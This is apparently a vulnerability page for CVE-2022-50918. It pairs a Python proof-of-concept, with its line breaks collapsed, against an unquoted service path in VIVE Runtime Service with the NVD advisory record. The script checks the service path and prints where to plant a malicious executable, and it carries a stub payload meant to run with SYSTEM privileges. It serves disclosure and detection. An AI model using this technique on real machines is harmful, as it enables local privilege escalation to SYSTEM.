CVE-2022-50918

#!/usr/bin/env python3 # CVE-2022-50918 PoC - VIVE Runtime Service Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in VIVE Runtime Service import os import sys import ctypes import subprocess def check_vulnerability(): """Check if VIVE Runtime Service is installed and has unquoted path""" try: # Query service configuration using sc command result = subprocess.run( ['sc', 'qc', 'VIVEAgentService'], capture_output=True, text=True ) if result.returncode == 0: output = result.stdout print(f"[+] VIVEAgentService found!") print(f"Service config:\n{output}") # Check for unquoted path with spaces lines = output.split('\n') for line in lines: if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[+] Binary path: {path}") # Check if path contains spaces and is not quoted if ' ' in path and not (path.startswith('"') and path.endswith('"')): print("[!] VULNERABLE: Path contains spaces and is not quoted!") return True else: print("[-] Not vulnerable or path is properly quoted") return False else: print("[-] VIVEAgentService not found on this system") return False except Exception as e: print(f"[-] Error checking service: {e}") return False def exploit(): """Exploit the unquoted service path vulnerability""" # Paths that would be checked before the actual executable # Adjust these paths based on the actual vulnerable service path target_paths = [ r"C:\Program.exe", r"C:\Program Files\VIVE\runtime.exe" ] # Create malicious executable stub (for demonstration only) # In real attack, this would be actual malicious code malicious_code = ''' import os import sys # This would be the actual malicious payload # For demonstration, just write to a log file log_file = r"C:\\vulnerability_exploited.txt" try: with open(log_file, "w") as f: f.write("Exploited at: " + str(os.environ)) # Execute actual malicious operations here with SYSTEM privileges os.system("whoami > C:\\whoami.txt") except: pass ''' print("[*] This is a PoC demonstration") print("[*] In a real attack, malicious executable would be placed at:") for path in target_paths: print(f" - {path}") print("[*] When VIVEAgentService starts, it will execute the malicious file") print("[*] The malicious code runs with SYSTEM privileges") if __name__ == "__main__": print("="*60) print("CVE-2022-50918 PoC - VIVE Runtime Service Unquoted Path") print("="*60) if os.name == 'nt': check_vulnerability() exploit() else: print("[-] This exploit only works on Windows systems")

{"cve": {"id": "CVE-2022-50918", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VIVE Runtime Service 1.0.0.4 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path by placing malicious executables in specific system directories to gain LocalSystem access during service startup."}, {"lang": "es", "value": "VIVE Runtime Service 1.0.0.4 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta binaria sin comillas al colocar ejecutables maliciosos en directorios específicos del sistema para obtener acceso LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://developer.vive.com/resources/downloads/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50824", "source": "[email protected]"}, {"url": "https://www.vive.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vive-runtime-service-viveagentservice-unquoted-service-path", "source": "[email protected]"}]}}